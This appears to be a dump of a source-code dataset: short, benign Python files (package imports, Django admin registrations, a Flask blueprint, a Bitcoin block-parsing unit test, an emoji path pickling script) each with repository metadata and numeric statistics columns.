8c4edc7eb77123cf777a768192ed4eb0f918e25c | 57 | py | Python | run/module/__init__.py | run-hub/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | 1 | 2016-01-14T19:37:31.000Z | 2016-01-14T19:37:31.000Z | run/module/__init__.py | roll/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | null | null | null | run/module/__init__.py | roll/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | null | null | null | from .converter import module
from .module import Module
| 19 | 29 | 0.824561 | 8 | 57 | 5.875 | 0.5 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 57 | 2 | 30 | 28.5 | 0.959184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8c514803defd8e3e7cdb970f07f39ef1470b62e2 | 82 | py | Python | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | from simulation.stock import StockPrice
from simulation.portfolio import Portfolio | 41 | 42 | 0.890244 | 10 | 82 | 7.3 | 0.6 | 0.383562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085366 | 82 | 2 | 42 | 41 | 0.973333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8b18ff2a9572bdae1b0de7a8ba348b4407d61c89 | 344 | py | Python | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | 5 | 2022-02-04T08:29:23.000Z | 2022-02-09T17:00:21.000Z | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | null | null | null | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | 1 | 2022-01-04T05:47:48.000Z | 2022-01-04T05:47:48.000Z | from conans import ConanFile
# -----------------------------------------------------------------------------
def configure(params={}):
pass
# -----------------------------------------------------------------------------
def requirements(params={}):
conanfile: ConanFile = params["conanfile"]
conanfile.requires("gtest/1.11.0")
| 24.571429 | 79 | 0.369186 | 21 | 344 | 6.047619 | 0.666667 | 0.23622 | 0.377953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012945 | 0.101744 | 344 | 13 | 80 | 26.461538 | 0.398058 | 0.450581 | 0 | 0 | 0 | 0 | 0.112903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.166667 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
8b29eea9147e26fe811a7ac315ad3ac8146e22d9 | 123 | py | Python | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | '''
Author: jianzhnie
Date: 2022-03-29 18:17:00
LastEditTime: 2022-03-29 18:17:00
LastEditors: jianzhnie
Description:
'''
| 13.666667 | 33 | 0.731707 | 19 | 123 | 4.736842 | 0.631579 | 0.133333 | 0.177778 | 0.222222 | 0.311111 | 0.311111 | 0 | 0 | 0 | 0 | 0 | 0.256881 | 0.113821 | 123 | 8 | 34 | 15.375 | 0.568807 | 0.918699 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8b2ce749ae35e72d98852471c1894889b0d193bc | 20 | py | Python | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 1,630 | 2021-10-30T01:00:27.000Z | 2022-03-31T23:02:41.000Z | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 166 | 2021-10-30T01:03:01.000Z | 2022-03-31T14:19:07.000Z | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 253 | 2021-10-30T06:10:29.000Z | 2022-03-31T13:30:06.000Z | from ._util import * | 20 | 20 | 0.75 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8cb401906d5bf458305cea251184ac0b6dc7c9cc | 151 | py | Python | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 5 | 2021-03-30T23:36:03.000Z | 2022-02-01T19:25:19.000Z | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 7 | 2021-04-08T18:53:08.000Z | 2021-04-27T07:44:32.000Z | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 1 | 2021-03-30T23:36:16.000Z | 2021-03-30T23:36:16.000Z | from utils.makeResponse import returnRenderedTemplate
def Handler(requestHeaders):
return returnRenderedTemplate("WEngine/index.html", {}, 200) | 37.75 | 64 | 0.794702 | 14 | 151 | 8.571429 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.112583 | 151 | 4 | 64 | 37.75 | 0.873134 | 0 | 0 | 0 | 0 | 0 | 0.120805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
8cd70d05a7c45ab413793b7dd08aa2043c898fbf | 232 | py | Python | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 24 | 2017-09-06T20:39:44.000Z | 2022-03-21T10:21:35.000Z | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 5 | 2021-01-01T23:07:04.000Z | 2022-02-28T13:26:43.000Z | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 20 | 2017-09-07T14:35:30.000Z | 2022-03-26T14:52:22.000Z | from .. import Verb
from ..interface import Adapter
class IntAdapter(Adapter):
def __init__(self, integer: int):
self.integer: int = integer
def get_value(self, ctx: Verb) -> str:
return str(self.integer) | 29 | 43 | 0.663793 | 30 | 232 | 4.966667 | 0.566667 | 0.221477 | 0.187919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228448 | 232 | 8 | 44 | 29 | 0.832402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.285714 | 0.142857 | 0.857143 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5075b843047190f2c389f87b6ce0ec971122a2db | 30 | py | Python | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
] | 2 | 2021-02-15T12:56:58.000Z | 2021-02-21T12:38:47.000Z | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
] | null | null | null | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
] | null | null | null | version = '20201111T173146Z'
| 15 | 29 | 0.766667 | 3 | 30 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.518519 | 0.1 | 30 | 1 | 30 | 30 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.551724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba03fc30a5daab70da87fd3bbb9beedef6a580eb | 493 | py | Python | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | epi_judge_python/sunset_view.py | shobhitmishra/CodingProblems | 0fc8c5037eef95b3ec9826b3a6e48885fc86659e | [
"MIT"
] | null | null | null | from typing import Iterator, List
from test_framework import generic_test
def examine_buildings_with_sunset(sequence: Iterator[int]) -> List[int]:
# TODO - you fill in here.
return []
def examine_buildings_with_sunset_wrapper(sequence):
return examine_buildings_with_sunset(iter(sequence))
if __name__ == '__main__':
exit(
generic_test.generic_test_main('sunset_view.py', 'sunset_view.tsv',
examine_buildings_with_sunset))
| 25.947368 | 75 | 0.703854 | 60 | 493 | 5.316667 | 0.5 | 0.200627 | 0.250784 | 0.326019 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212982 | 493 | 18 | 76 | 27.388889 | 0.822165 | 0.048682 | 0 | 0 | 0 | 0 | 0.079229 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e84077e8e3e4204cf296691cf627d89c56af4d3e | 28 | py | Python | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | Python/pullstats.py | gilneidp/FinalProject | ec4f35d154bc4383ccde113126e493c1521ad21a | [
"MIT"
] | null | null | null | import pox
import oslib
| 7 | 13 | 0.714286 | 4 | 28 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 28 | 3 | 14 | 9.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e85bc0851afc9f6a3b31186577528ce178e28e1b | 105 | py | Python | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | 4 | 2017-10-09T21:53:44.000Z | 2020-12-02T19:11:08.000Z | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | null | null | null | tags/admin.py | SuperLeet-CTF/SuperLeet-CTF | 3af085d310a8303ef3aff376ba930649586d5993 | [
"MIT"
] | 1 | 2020-09-02T06:02:31.000Z | 2020-09-02T06:02:31.000Z | from django.contrib import admin
from .models import Tag, TagAdmin
admin.site.register(Tag, TagAdmin)
| 15 | 34 | 0.790476 | 15 | 105 | 5.533333 | 0.666667 | 0.26506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 105 | 6 | 35 | 17.5 | 0.912088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e86694be63a0fd722ac8d6bf34b4f75466d775b3 | 205 | py | Python | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | task3/api/admin.py | dnantonov/tatneft | 9ccee4426c095369cc7c57f260a90bb923119b72 | [
"MIT"
] | null | null | null | from django.contrib import admin
from api.models import GasStation, Image, Service, Fuel
admin.site.register(Image)
admin.site.register(Service)
admin.site.register(GasStation)
admin.site.register(Fuel)
| 22.777778 | 55 | 0.814634 | 29 | 205 | 5.758621 | 0.448276 | 0.215569 | 0.407186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082927 | 205 | 8 | 56 | 25.625 | 0.888298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e867ba316a566db77ef3d98e8a9246bdcc5d9212 | 130 | py | Python | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | app/recipes/__init__.py | janist7/mangarso.com | 74210c604b27084213b519a28ffae6f01e552900 | [
"MIT"
] | null | null | null | from flask import Blueprint
recipes = Blueprint('recipes', __name__, template_folder='templates')
from app.recipes import views
| 21.666667 | 69 | 0.8 | 16 | 130 | 6.1875 | 0.6875 | 0.323232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 130 | 5 | 70 | 26 | 0.86087 | 0 | 0 | 0 | 0 | 0 | 0.123077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
e87c0cc0d4eaa2bc26e6fe3d21fdc61e63deffae | 2,509 | py | Python | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 176 | 2015-01-01T04:29:39.000Z | 2021-12-04T06:22:44.000Z | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 15 | 2015-02-25T08:54:15.000Z | 2018-07-30T20:08:14.000Z | pycoin/test/parse_block_test.py | FaSan/proofofexistence | 10703675824e989f59a8d36fd8c06394e71a2c25 | [
"MIT"
] | 82 | 2015-01-15T12:47:23.000Z | 2020-09-25T05:25:54.000Z | #!/usr/bin/env python
import io
import unittest
from pycoin.block import Block
from pycoin.encoding import h2b
from pycoin.serialize import b2h_rev
class BlockTest(unittest.TestCase):
def test_block(self):
expected_checksum = '0000000000089F7910F6755C10EA2795EC368A29B435D80770AD78493A6FECF1'.lower()
block_data = h2b('010000007480150B299A16BBCE5CCDB1D1BBC65CFC5893B01E6619107C55200000000000790'\
'0A2B203D24C69710AB6A94BEB937E1B1ADD64C2327E268D8C3E5F8B41DBED8796974CED66471B204C3247030'\
'1000000010000000000000000000000000000000000000000000000000000000000000000FFFFFFFF0804ED6'\
'6471B024001FFFFFFFF0100F2052A010000004341045FEE68BAB9915C4EDCA4C680420ED28BBC369ED84D48A'\
'C178E1F5F7EEAC455BBE270DABA06802145854B5E29F0A7F816E2DF906E0FE4F6D5B4C9B92940E4F0EDAC000'\
'000000100000001F7B30415D1A7BF6DB91CB2A272767C6799D721A4178AA328E0D77C199CB3B57F010000008'\
'A4730440220556F61B84F16E637836D2E74B8CB784DE40C28FE3EF93CCB7406504EE9C7CAA5022043BD4749D'\
'4F3F7F831AC696748AD8D8E79AEB4A1C539E742AA3256910FC88E170141049A414D94345712893A828DE57B4C'\
'2054E2F596CDCA9D0B4451BA1CA5F8847830B9BE6E196450E6ABB21C540EA31BE310271AA00A49ED0BA930743'\
'D1ED465BAD0FFFFFFFF0200E1F505000000001976A914529A63393D63E980ACE6FA885C5A89E4F27AA08988AC'\
'C0ADA41A000000001976A9145D17976537F308865ED533CCCFDD76558CA3C8F088AC000000000100000001651'\
'48D894D3922EF5FFDA962BE26016635C933D470C8B0AB7618E869E3F70E3C000000008B48304502207F5779EB'\
'F4834FEAEFF4D250898324EB5C0833B16D7AF4C1CB0F66F50FCF6E85022100B78A65377FD018281E77285EFC3'\
'1E5B9BA7CB7E20E015CF6B7FA3E4A466DD195014104072AD79E0AA38C05FA33DD185F84C17F611E58A8658CE'\
'996D8B04395B99C7BE36529CAB7606900A0CD5A7AEBC6B233EA8E0FE60943054C63620E05E5B85F0426FFFFF'\
'FFF02404B4C00000000001976A914D4CAA8447532CA8EE4C80A1AE1D230A01E22BFDB88AC8013A0DE0100000'\
'01976A9149661A79AE1F6D487AF3420C13E649D6DF3747FC288AC00000000')
# try to parse a block
block = Block.parse(io.BytesIO(block_data))
print(block)
assert b2h_rev(block.hash()) == expected_checksum
for tx in block.txs:
print(tx)
for t in tx.txs_in:
print(" %s" % t)
for t in tx.txs_out:
print(" %s" % t)
block.check_merkle_hash()
def main():
unittest.main()
if __name__ == "__main__":
main()
| 47.339623 | 104 | 0.779992 | 114 | 2,509 | 17 | 0.552632 | 0.01548 | 0.006192 | 0.008256 | 0.011352 | 0 | 0 | 0 | 0 | 0 | 0 | 0.50144 | 0.16939 | 2,509 | 52 | 105 | 48.25 | 0.428503 | 0.016341 | 0 | 0.051282 | 0 | 0 | 0.638774 | 0.632146 | 0 | 1 | 0 | 0 | 0.025641 | 1 | 0.051282 | false | 0 | 0.128205 | 0 | 0.205128 | 0.102564 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e88c58cacb028ae009886823cf496eb85217a7c7 | 1,760 | py | Python | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | rpi-rgb-led-matrix-master/makeEmojiPickleList.py | hammal/macapar | 05fb84b8f5e967ed6d3edb0891ac58674e6b60bc | [
"MIT"
] | null | null | null | import os
import pickle

# (source directory, output pickle file) pairs
targets = [
    ("./emojis/emotions/", "emojiemotionlist.txt"),
    ("./emojis/aon/", "emojiaonlist.txt"),
    ("./emojis/antik/", "antiklist.txt"),
    ("./emojis/gunnar/", "gunnarlist.txt"),
    ("./emojis/martin/", "martinlist.txt"),
]

for directory, outfile in targets:
    # collect absolute paths of all visible .png files under the directory
    emojipaths = []
    for root, dirs, files in os.walk(directory, topdown=False):
        for name in files:
            if name.endswith(".png") and not name.startswith("."):
                # join with root so files found in subdirectories resolve correctly
                emojipaths.append(os.path.abspath(os.path.join(root, name)))
    # save as pickle
    with open(outfile, "wb") as fp:
        pickle.dump(emojipaths, fp)
e8a954eed5c830425f753bd2182902f5f612c8b5 | 49 | py | Python | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | ex43a.py | shwezinoo/python-excercises | f2507ad8ec161bb1e12a3667946f2cb48c422bb4 | [
"MIT"
] | null | null | null | from sys import exit
from random import randint
| 12.25 | 26 | 0.816327 | 8 | 49 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183673 | 49 | 3 | 27 | 16.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.